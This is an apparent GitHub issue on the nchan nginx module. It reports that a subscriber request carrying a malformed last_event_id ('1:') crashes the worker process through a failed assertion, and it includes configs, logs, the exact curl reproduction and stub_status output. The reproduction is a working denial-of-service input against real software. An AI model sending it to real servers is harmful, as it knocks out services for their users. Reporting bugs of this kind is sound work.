Using invalid msgid for dos attacks?

I tested and found that invalid msgid will cause the process to exit.

I am using nginx-mod-nchan installed in APT repositories: libnginx-mod-nchan/testing,now 1:1.3.6+dfsg-2 amd64 [installed]

term1 # nginx -c /root/test1.conf
2023/06/23 21:10:02 [notice] 3938991#3938991: using the "epoll" event method
2023/06/23 21:10:02 [notice] 3938991#3938991: nginx/1.22.1
2023/06/23 21:10:02 [notice] 3938991#3938991: OS: Linux 6.1.0-9-amd64
2023/06/23 21:10:02 [notice] 3938991#3938991: getrlimit(RLIMIT_NOFILE): 5000:65535
2023/06/23 21:10:02 [notice] 3938991#3938991: start worker processes
2023/06/23 21:10:02 [notice] 3938991#3938991: start worker process 3938992
2023/06/23 21:10:13 [info] 3938992#3938992: *1 client prematurely closed connection, client: 127.0.0.1, server: _, request: "GET /sub?last_event_id=1: HTTP/1.1", host: "127.0.0.1:8200"
nginx: worker process: ././src/store/spool.c:479: spool_fetch_msg: Assertion `spool->msg_status == MSG_INVALID' failed.
2023/06/23 21:10:14 [notice] 3938991#3938991: signal 17 (SIGCHLD) received from 3938992
2023/06/23 21:10:14 [alert] 3938991#3938991: worker process 3938992 exited on signal 6
2023/06/23 21:10:14 [notice] 3938991#3938991: start worker process 3939157

^C2023/06/23 21:12:27 [notice] 3939157#3939157: signal 2 (SIGINT) received, exiting
2023/06/23 21:12:27 [notice] 3938991#3938991: signal 2 (SIGINT) received, exiting
2023/06/23 21:12:27 [info] 3939157#3939157: epoll_wait() failed (4: Interrupted system call)
2023/06/23 21:12:27 [notice] 3939157#3939157: exiting
2023/06/23 21:12:27 [notice] 3939157#3939157: exit
2023/06/23 21:12:27 [notice] 3938991#3938991: signal 17 (SIGCHLD) received from 3939157
2023/06/23 21:12:27 [notice] 3938991#3938991: worker process 3939157 exited with code 0
2023/06/23 21:12:27 [notice] 3938991#3938991: exit

term2 # curl "http://127.0.0.1:8200/sub?last_event_id=1:"
^C
term2 # curl "http://127.0.0.1:8200/sub?last_event_id=1:"
curl: (52) Empty reply from server
term2 # curl "http://127.0.0.1:8200/sub?last_event_id=1:"
^C
term2 # curl "http://127.0.0.1:8200/sub?last_event_id=1:"
curl: (52) Empty reply from server
term2 #

nginx.conf:

daemon off;
worker_processes 1;
master_process on;

error_log /dev/stderr info;
pid /var/run/nginx1.pid;

load_module modules/ngx_nchan_module.so;
events {}

http {
  server {
    listen 8200;
    server_name _ default;
    location /sub {
      nchan_subscriber ;
      nchan_channel_id test1;
    }
  }
}

please add
    location /nchan_stub_status { 
      nchan_stub_status; 
    } 
and show me the output of curl http://127.0.0.1:8200/nchan_stub_status

I will try again using the latest version

the nginx configuration

daemon off;
worker_processes 1;
master_process on;

error_log /dev/stderr info;
pid /var/run/nginx1.pid;

load_module modules/ngx_nchan_module.so;

events {}

http {
  server {
    listen 8200;
    server_name _ default;

    location /sub {
      nchan_subscriber ;
      nchan_channel_id test1;
    }

    location /nchan_stub_status {
      nchan_stub_status;
    }
  }
}

nginx output

term1 ~# nginx -c /root/test1.conf
2023/07/26 14:40:21 [notice] 2751287#2751287: using the "epoll" event method
2023/07/26 14:40:21 [notice] 2751287#2751287: nginx/1.22.1
2023/07/26 14:40:21 [notice] 2751287#2751287: OS: Linux 6.1.0-9-amd64
2023/07/26 14:40:21 [notice] 2751287#2751287: getrlimit(RLIMIT_NOFILE): 5000:65535
2023/07/26 14:40:21 [notice] 2751287#2751287: start worker processes
2023/07/26 14:40:21 [notice] 2751287#2751287: start worker process 2751288

2023/07/26 14:40:41 [info] 2751288#2751288: *1 client 127.0.0.1 closed keepalive connection
2023/07/26 14:41:01 [info] 2751288#2751288: *3 client 127.0.0.1 closed keepalive connection
2023/07/26 14:41:06 [info] 2751288#2751288: *2 client prematurely closed connection, client: 127.0.0.1, server: _, request: "GET /sub?last_event_id=1: HTTP/1.1", host: "127.0.0.1:8200"
2023/07/26 14:41:18 [info] 2751288#2751288: *5 client 127.0.0.1 closed keepalive connection
2023/07/26 14:41:23 [info] 2751288#2751288: *4 client prematurely closed connection, client: 127.0.0.1, server: _, request: "GET /sub?last_event_id=1: HTTP/1.1", host: "127.0.0.1:8200"
nginx: worker process: ././src/store/spool.c:479: spool_fetch_msg: Assertion `spool->msg_status == MSG_INVALID' failed.
2023/07/26 14:41:24 [notice] 2751287#2751287: signal 17 (SIGCHLD) received from 2751288
2023/07/26 14:41:24 [alert] 2751287#2751287: worker process 2751288 exited on signal 6
2023/07/26 14:41:24 [notice] 2751287#2751287: start worker process 2752233
2023/07/26 14:41:27 [info] 2752233#2752233: *7 client 127.0.0.1 closed keepalive connection

^C2023/07/26 14:42:13 [notice] 2751287#2751287: signal 2 (SIGINT) received, exiting
2023/07/26 14:42:13 [notice] 2752233#2752233: signal 2 (SIGINT) received, exiting
2023/07/26 14:42:13 [notice] 2752233#2752233: exiting
2023/07/26 14:42:13 [notice] 2752233#2752233: exit
2023/07/26 14:42:13 [notice] 2751287#2751287: signal 17 (SIGCHLD) received from 2752233
2023/07/26 14:42:13 [notice] 2751287#2751287: worker process 2752233 exited with code 0
2023/07/26 14:42:13 [notice] 2751287#2751287: exit

curl terminal

term2 ~# curl "http://127.0.0.1:8200/sub?last_event_id=1:"
^C⏎
term2 ~ [SIGINT]# curl "http://127.0.0.1:8200/sub?last_event_id=1:"
^C⏎
term2 ~ [SIGINT]# curl "http://127.0.0.1:8200/sub?last_event_id=1:"
curl: (52) Empty reply from server
term2 ~ [52]#

stub_status info

term3 ~# # After nginx startup 
term3 ~# curl http://127.0.0.1:8200/nchan_stub_status
total published messages: 0
stored messages: 0
shared memory used: 16K
shared memory limit: 131072K
channels: 0
subscribers: 0
redis pending commands: 0
redis connected servers: 0
redis unhealthy upstreams: 0
total redis commands sent: 0
total interprocess alerts received: 0
interprocess alerts in transit: 0
interprocess queued alerts: 0
total interprocess send delay: 0
total interprocess receive delay: 0
nchan version: 1.3.6
term3 ~#
term3 ~# # Subscribe using curl
term3 ~# curl http://127.0.0.1:8200/nchan_stub_status
total published messages: 0
stored messages: 0
shared memory used: 20K
shared memory limit: 131072K
channels: 1
subscribers: 1
redis pending commands: 0
redis connected servers: 0
redis unhealthy upstreams: 0
total redis commands sent: 0
total interprocess alerts received: 0
interprocess alerts in transit: 0
interprocess queued alerts: 0
total interprocess send delay: 0
total interprocess receive delay: 0
nchan version: 1.3.6
term3 ~#
term3 ~#
term3 ~# # Interrupt curl subscription with ctrl+c
term3 ~# curl http://127.0.0.1:8200/nchan_stub_status
total published messages: 0
stored messages: 0
shared memory used: 20K
shared memory limit: 131072K
channels: 1
subscribers: 1
redis pending commands: 0
redis connected servers: 0
redis unhealthy upstreams: 0
total redis commands sent: 0
total interprocess alerts received: 0
interprocess alerts in transit: 0
interprocess queued alerts: 0
total interprocess send delay: 0
total interprocess receive delay: 0
nchan version: 1.3.6
term3 ~#
term3 ~# # After using curl subscription for the third time
term3 ~# curl http://127.0.0.1:8200/nchan_stub_status
total published messages: 0
stored messages: 0
shared memory used: 20K
shared memory limit: 131072K
channels: 0
subscribers: 0
redis pending commands: 0
redis connected servers: 0
redis unhealthy upstreams: 0
total redis commands sent: 0
total interprocess alerts received: 0
interprocess alerts in transit: 0
interprocess queued alerts: 0
total interprocess send delay: 0
total interprocess receive delay: 0
nchan version: 1.3.6
term3 ~#

slact / nchan

Using invalid msgid for dos attacks? #670